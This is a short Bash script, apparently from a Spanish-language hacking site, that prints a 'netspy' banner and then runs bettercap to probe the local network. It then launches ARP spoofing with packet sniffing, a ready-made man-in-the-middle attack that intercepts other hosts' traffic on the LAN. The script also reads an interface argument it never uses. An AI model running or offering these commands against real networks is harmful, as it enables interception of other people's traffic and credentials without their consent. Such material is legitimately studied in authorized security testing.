cat << "INFO"
            _                   
            | |                  
  _ __   ___| |_ ___ _ __  _   _ 
 | '_ \ / _ \ __/ __| '_ \| | | |
 | | | |  __/ |_\__ \ |_) | |_| |
 |_| |_|\___|\__|___/ .__/ \__, |
                    | |     __/ |
                    |_|    |___/  v1.0
             www.hackingyseguridad.com
INFO
if [ -z "$1" ]; then
        echo
        echo "Captura y muestra en pantalla el trafico."
        echo "Uso.: sh netspy.sh <nterface>"
        echo 
        exit 0
fi
echo
echo
#netdiscover -i $1
bettercap  -eval "net.probe on; ticker on "
bettercap  -eval "net.probe on; set arp.spoof.targets; arp.spoof on; set net.sniff.verbose false; net.sniff on"
